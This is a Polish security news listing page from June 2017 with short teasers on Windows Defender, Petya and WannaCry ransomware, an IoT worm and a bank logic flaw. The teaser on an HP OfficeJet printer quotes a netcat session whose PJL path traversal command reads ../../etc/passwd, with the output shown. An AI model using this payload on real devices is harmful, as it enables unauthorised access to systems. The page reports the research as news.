Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

W biegu

Windows Defender – zdalny admin bez interakcji użytkownika

28 czerwca 2017, 19:11 | W biegu | 0 komentarzy

Microsoft niedawno załatał kolejną podatność w Windows Defenderze, która umożliwiała wykonanie kodu na systemie ofiary. Wystarczyło przesłać exploita np. mailem i w przypadku real time protection Windows Defender automatycznie skanował podejrzaną binarkę. Podejrzana binarka z kolei wykorzystywała błąd w antymalware Microsoftu, dając pełną kontrolę nad atakowanym komputerem. Sam Microsoft opisuje to dość zgrabnie:…

Czytaj dalej »

Prosta metoda uratowanie plików przed ransomware Petya

27 czerwca 2017, 21:12 | W biegu | komentarzy 30

Jeśli tylko widzisz taki ekran poniżej (infekcja ransomware Petya), wyłącz jak najszybciej komputer. Jest to proces szyfrowania Twoich plików, jeśli więc go przerwiesz, pliki powinny być bezpieczne (można je będzie odzyskać, podłączając w odpowiednio bezpieczny sposób dysk do innego komputera). Uwaga – nie włączaj ponownie swojego PC-ta z zainfekowanym dyskiem! –ms

Czytaj dalej »

System monitorowania promieniowania elektrowni w Czarnobylu przejęty przez ransomware Petya

27 czerwca 2017, 20:18 | W biegu | komentarze 2

Obecny globalny atak ransomware Petya wydaje się zdecydowanie bardziej zjadliwy niż Wanacry. Przejmowane są systemy w najróżniejszych branżach, a właśnie doniesiono o zainfekowaniu systemu monitorowania promieniowania w elektrowni atomowej w Czarnobylu. Władze zostały zmuszone do przejścia na monitorowanie ręczne: Systems usually used to monitor the area around the power station –…

Czytaj dalej »

Przygotowali robaka atakującego IoT – bezprzewodowo potrafi przejmować całe miasta

23 czerwca 2017, 12:55 | W biegu | komentarze 3

Całość w szczegółowej izraelsko-kandyjskiej pracy zatytułowanej: „IoT Goes Nuclear: Creating a ZigBee Chain Reaction„. W dużym skrócie akcja wykorzystuje bezprzewodowy protokół komunikacyjny ZigBee, chętnie wykorzystywany przez rozmaite urządzenia IoT. Jako Proof of Concept użyto inteligentnych żarówek (Phillips HUE): Jak można wystartować atak? Wystarczy wkręcić gdzieś jedną zainfekowaną żarówkę…: The attack…

Czytaj dalej »

Ransomware zaatakował radary prędkości – unieważnione mandaty

23 czerwca 2017, 11:41 | W biegu | 1 komentarz

Chodzi o słynny WannaCry. Incydent dotyczy Australii, kontrolę utracono nad 55 urządzeniami służącymi do mierzenia prędkości samochodów a także moniotorowania przejazdów na czerwonym świetle. W jaki sposób doszło do infekcji? Najprawdopodobniej ransomware dostał się poprzez  zainfekowany komputer i/lub nośnik USB, użyty przez technika robiącego okresowy przegląd  infrastruktury. Finalnie unieważniono 590…

Czytaj dalej »

Sąd Najwyższy USA: nie można karać zakazem dostępu do Internetu

21 czerwca 2017, 20:14 | W biegu | 1 komentarz

Amerykański Sąd Najwyższy (Supreme Court) właśnie wydał wyrok, w którym orzekł, że nie można karać zakazem dostępu do Internetu, i nie ma tu znaczenia jakie przestępstwa się popełniło. W konkretnej sprawie, która była omawiana chodziło zakaz dostępu do konkretnych serwisów: By prohibiting sex offenders from using those websites, North Carolina…

Czytaj dalej »

Tak długo rozmawiał z drukarką HP aż dostał roota bez uwierzytelnienia

21 czerwca 2017, 19:45 | W biegu | komentarze 2

Dość dokładny opis rootowania drukarki HP OfficeJet Pro 8210. Rozmowa odbywała się protokołem PJL. Od zwykłego odpytania o nazwę drukarki: albinolobster@ubuntu:~$ nc 192.168.1.159 9100 @PJL INFO ID @PJL INFO ID „HP OfficeJet Pro 8210″ przez Path Traversal: @PJL FSUPLOAD NAME=”../../etc/passwd” OFFSET=0 SIZE=648 @PJL FSUPLOAD FORMAT:BINARY NAME=”../../etc/passwd” OFFSET=0 SIZE=648 root:x:0:0:root:/var/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh…

Czytaj dalej »

Ukradł niemal 500 000 złotych z banku – przez błąd logiczny w bankowości elektronicznej

21 czerwca 2017, 19:26 | W biegu | komentarzy 6

Jak donosi BBC, James Ejankowski wydał wykradzione środki na BMW, Range Rovera i tatuaże na swojej twarzy. Wykorzystany problem został już załatany, a polegał na możliwości przelewu pieniędzy na własne konto oszczędnościowe z konta, na którym nie istniały żadne środki… Co ciekawe operacja możliwa była tylko w przedziale godzinowym 0:00 – 1:00:…

Czytaj dalej »

Nowy Linux Magazine

12 czerwca 2017, 14:00 | W biegu | komentarze 3

Artykuły wiodące czerwcowego wydania „Linux Magazine” opisują przydatne narzędzia: Zim – wieloplatformowe wiki działające na pulpicie, nowy pakiet biurowy OnlyOffice Desktop Editor, rozwiązanie do samoorganizacji Getting Things Gnome i SeaMonkey Internet Suite do lekkiego przeglądania Sieci. Na dołączonym DVD znajduje się Megapak Ubuntu 17.04: Ubuntu 17.04 – Kubuntu 17.04 –…

Czytaj dalej »

Konferencja: Technology Risk Management Forum

29 maja 2017, 23:27 | W biegu | 0 komentarzy

Zapraszamy do zerknięcia na program tegorocznej wrocławskiej konferencji https://techrisk.pl/ Sami organizatorzy piszą tak: Zapraszamy na TechRisk 2017 – jedyną w Polsce konferencję poświęconą wyłącznie tematyce ryzyka technologicznego! Wielu firmom wydaje się, że w obszarze bezpieczeństwa technologicznego robią wszystko zgodnie ze sztuką, nie zauważając, że to właśnie sztuka się zmieniła. Budżety na…

Czytaj dalej »